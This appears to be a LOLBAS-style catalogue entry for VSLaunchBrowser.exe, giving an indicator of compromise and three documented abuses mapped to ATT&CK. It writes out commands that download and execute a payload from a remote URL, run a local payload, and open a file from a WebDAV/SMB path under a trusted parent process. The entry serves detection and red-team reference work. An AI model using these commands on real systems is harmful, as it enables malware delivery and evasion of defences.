IOC: VSLaunchBrowser making unexpected network connections or DNS requests
Download
Download and execute payload from remote server
VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
Use case
It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Privileges required
User
Operating systems
Windows
ATT&CK® technique
T1105
Tags
Download: INetCache
Execute
Execute payload via VSLaunchBrowser as parent process
VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe}
Use case
It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
Privileges required
User
Operating systems
Windows
ATT&CK® technique
T1127
Tags
Execute: EXE
Execute payload from WebDAV server via VSLaunchBrowser as parent process
VSLaunchBrowser.exe .exe {PATH_SMB}
Use case
It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.